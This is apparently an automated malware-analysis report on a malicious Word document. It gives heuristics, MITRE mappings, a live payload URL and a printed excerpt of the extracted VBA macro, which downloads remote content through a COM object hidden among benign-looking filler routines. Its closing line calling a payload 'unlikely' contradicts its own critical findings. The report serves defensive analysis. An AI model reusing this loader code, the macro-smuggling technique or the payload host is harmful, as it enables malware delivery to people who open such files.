MALICIOUS
Risk Score: 372
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The file contains a critical obfuscated auto-exec VBA loader with a Document_Open macro, indicating malicious intent. The VBA script attempts to download and execute a payload from the URL http://ikh63fd.imparisystems.com/UTRO.php. This is further supported by the embedded OLE object also containing a macro and pointing to the same URL.
Heuristics (10)
- ClamAV: Doc.Malware.Ehrf-10008131-0 (critical; CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Ehrf-10008131-0
- Embedded Office object carries macros (critical; OFFICE_EMBEDDED_MACRO_OBJECT): This document embeds a second Office file that itself contains a VBA macro project or an Excel 4.0 (XLM) macro sheet. Hiding a macro-bearing workbook or document inside another document, frequently under an obfuscated, non-standard part name, is a macro-smuggling technique that defeats scanners which only inspect the outer document's macro storage. No benign authoring workflow stages a hidden macro project this way.
- VBA project inside OOXML (medium; OOXML_VBA; 4 related findings): Document contains a VBA project (VBA macros present)
- Obfuscated auto-exec VBA loader (critical; OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Document_Open macro (high; OLE_VBA_DOCOPEN)
- CreateObject call (high; OLE_VBA_CREATEOBJ)
- Environ() call (env variable access) (low; OLE_VBA_ENVIRON)
- Embedded OLE object (medium; OOXML_OLE_OBJECT): Document contains an embedded OLE object
- Payload URL recovered from embedded OLE object (1 URL) (info; OOXML_EMBEDDED_OBJECT_URL): An embedded OLE object (xl/word/ppt embeddings) carries a next-stage download URL in its Ole10Native/Package stream, stored literally (incl. UTF-16) or base64-encoded, which the package-level URL sweep does not see. Surfaced as an IOC; self-validating (only real payload hosts).
- Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ikh63fd.imparisystems.com/UTRO.php (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text: OOXML body / shared strings)
  - http://ns.adobe.com/xap/1.0/ (in document text: OOXML body / shared strings)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text: OOXML body / shared strings)
  - http://ns.adobe.com/photoshop/1.0/ (in document text: OOXML body / shared strings)
  - http://purl.org/dc/elements/1.1/ (in document text: OOXML body / shared strings)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text: OOXML body / shared strings)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text: OOXML body / shared strings)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text: OOXML body / shared strings)
Extracted artifacts (3)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9985 bytes | 753b04b799c1c13dc86848861086149289af1fc3bf8e24cfbcb0d0093214a624 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub vSDtPv()
If Year(Date) = 2019 Then
hZWemp.grhgrgrg
End If
ThisDocument.Close
End Sub
Attribute VB_Name = "hZWemp"
Attribute VB_Base = "0{4888A8D6-9478-4555-AA01-426265E8A53C}{53624690-F57E-4A2D-9737-B47097B0914C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public kfAeXgL As String
Public hEorHPq As Object
Dim vlnmlgmrglpPP(309, 2) As String
Public Sub grhgrgrg()
On Error Resume Next
hZWemp.Hide
Set hEorHPq = CreateObject(fhvgut.Tag)
hEorHPq.navigate (hZWemp.yDsymL.Tag)
Do Until hEorHPq.readyState = 4
DoEvents
Loop
kfAeXgL = hEorHPq.Document.body.innerText
nxUVWWo
End Sub
'Replace accended chars with their plaintext alphabet counterparts
'Remove all shapes in the Active Document
Function DeleteShapes()
Dim i As Long
With ActiveDocument
For i = .Shapes.Count To 1 Step -1
With .Shapes(i)
If .Type = msoAutoShape Then .Delete
End With
Next i
End With
End Function
'Save a new file from range Section within the parent file with fileName from Range Header within Section
Private Static Sub CopyAndSave(Section As Range, Header As Range, maxFileName As Integer)
Dim name As String
Header.Select
Selection.ClearFormatting
Dim D As Document
'File name cannot contain \ / : * ? " < > |
name = Replace(Header.Text, Chr(13), "")
name = Application.CleanString(name)
name = Replace(name, "\", "-")
name = Replace(name, "/", "-")
name = Replace(name, ":", "-")
name = Replace(name, "?", "-")
name = Replace(name, "*", "")
name = Replace(name, """", "")
name = Replace(name, "<", " ")
name = Replace(name, ">", " ")
name = Replace(name, "|", " ")
name = Replace(name, " ", "")
name = Replace(name, Chr(10), "")
name = Replace(name, Chr(13), "")
name = Replace(name, Chr(9), "")
name = Replace(name, "‘", "'")
name = Replace(name, "’", "'")
name = Replace(name, "“", "'")
name = Replace(name, "”", "'")
name = Replace(name, " ", "")
name = Replace(name, "®", "(R)")
name = Replace(name, "™", "(TM)")
name = Replace(name, "™", "(TM)")
name = Replace(name, "£", "(E)")
name = Replace(name, " ", " ")
name = Replace(name, "–", "-")
name = Replace(name, "—", "-")
name = Trim(name)
'Debug.Print name
'Reformatting Header
Header.Select
Selection.Font.Bold = True
Selection.Font.Grow
'Truncate File names to under maxFileName chars
If (Len(name) > maxFileName) Then
name = Left(name, maxFileName) & " ..."
End If
'Debug.Print "Saving: " & name
Header.Copy
Section.Copy
'Saving Document
Set D = Documents.Add
D.Range.PasteAndFormat wdFormatOriginalFormatting
With D.Content.Find
.ClearFormatting
.MatchWildcards = True
.MatchCase = False
.Text = "^13([1-9]).([1-9])*^13"
.Replacement.ClearFormatting
.Replacement.Text = ""
.Execute Replace:=wdReplaceAll, Forward:=True, _
Wrap:=wdFindContinue
End With
D.SaveAs2 FileName:=Section.Parent.Path & Application.PathSeparator & name & ".htm", _
FileFormat:=wdFormatFilteredHTML
D.Close
End Sub
'Remove all existing hyperlinks in a document.
Private Static Sub RemoveAllHyperlinks()
Dim oField As Field
For Each oField In ActiveDocument.Fields
If oField.Type = wdFieldHyperlink Then
oField.Unlink
End If
Next
Set oField = Nothing
End Sub
P
... (truncated)
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| ooxml_oleobject_00.bin | ooxml-ole-object | OOXML embedded OLE part: word/embeddings/_________Microsoft_Word_97-20031.doc | 223232 bytes | 323fe57f6aa5b000b3eaa76049b1296c7794ae727d7b3ec54b6367a5e724bc34 |
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 14336 bytes | b1a7b3c0481646deaf6941c713b8191df65ddb36080d2e144e5fe9a83a78c1d2 |
Detection
- ClamAV: Doc.Malware.Ehrf-10008131-0
- Obfuscation or payload: unlikely